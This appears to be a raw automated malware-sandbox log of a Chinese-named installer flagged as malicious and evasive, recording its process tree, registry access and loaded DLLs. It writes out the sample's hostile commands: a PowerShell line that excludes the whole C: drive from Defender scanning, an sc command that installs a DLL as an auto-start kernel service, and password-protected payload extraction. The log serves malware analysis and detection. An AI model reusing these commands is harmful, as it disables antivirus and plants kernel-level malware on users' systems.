Source: #U5b89#U88c5#U52a9#U624b1.0.1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal84.evad.winEXE@116/33@0/0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9C5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C9C5D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00719313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_00719313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00723D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00723D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00719252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_00719252
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9C5240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,6_2_6C9C5240
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpFile created: C:\Program Files (x86)\Windows NT\is-9Q49J.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1576:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3224:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1564:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3116:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5296:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4296:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2172:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6008:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3176:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5972:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:764:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1488:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5628:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:768:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7124:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2820:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6480:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exeVirustotal: Detection: 6%
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp "C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20474,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe"
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp "C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20492,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp "C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20474,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp "C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20492,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
